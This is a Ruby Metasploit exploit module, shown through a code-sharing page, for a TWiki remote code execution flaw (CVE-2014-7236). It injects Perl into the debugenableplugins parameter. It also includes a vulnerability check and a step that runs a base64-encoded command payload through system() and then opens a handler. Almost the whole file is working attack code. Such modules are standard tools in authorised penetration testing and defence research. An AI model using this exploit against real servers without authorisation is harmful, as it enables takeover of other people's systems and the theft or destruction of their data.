CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/twiki_debug_plugins.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name' => 'TWiki Debugenableplugins Remote Code Execution',

14
      'Description' => %q{

15
        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.

16
        The value of the debugenableplugins parameter is used without proper sanitization

17
        in an Perl eval statement which allows remote code execution.

18
      },

19
      'Author' =>

20
        [

21
          'Netanel Rubin', # from Check Point - Discovery

22
          'h0ng10', # Metasploit Module

23


24
        ],

25
      'License' => MSF_LICENSE,

26
      'References' =>

27
        [

28
          [ 'CVE', '2014-7236'],

29
          [ 'OSVDB', '112977'],

30
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']

31
        ],

32
      'Privileged' => false,

33
      'Targets' =>

34
        [

35
          [ 'Automatic',

36
            {

37
              'Payload'        =>

38
                {

39
                  'BadChars' => "",

40
                  'Compat'      =>

41
                    {

42
                      'PayloadType' => 'cmd',

43
                      'RequiredCmd' => 'generic perl python php',

44
                    }

45
                },

46
              'Platform' => ['unix'],

47
              'Arch' => ARCH_CMD

48
            }

49
          ]

50
        ],

51
      'DefaultTarget'  => 0,

52
      'DisclosureDate' => '2014-10-09'))

53


54
    register_options(

55
      [

56
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),

57
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])

58
      ])

59
  end

60


61


62
  def send_code(perl_code)

63
    uri = target_uri.path

64
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

65


66
    res = send_request_cgi!({

67
      'method' => 'POST',

68
      'uri' => uri,

69
      'data' => data

70
    })

71


72
    return res

73
  end

74


75


76
  def check

77
    rand_1 = rand_text_alpha(5)

78
    rand_2 = rand_text_alpha(5)

79


80
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"

81
    res = send_code(code)

82


83
    if res and res.code == 200

84
      return CheckCode::Vulnerable if res.body == rand_1 + rand_2

85
    end

86
    CheckCode::Unknown

87
  end

88


89


90
  def exploit

91
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"

92
    code += "require('MIME/Base64.pm');MIME::Base64->import();"

93
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"

94
    res = send_code(code)

95
    handler

96


97
  end

98
end

99


100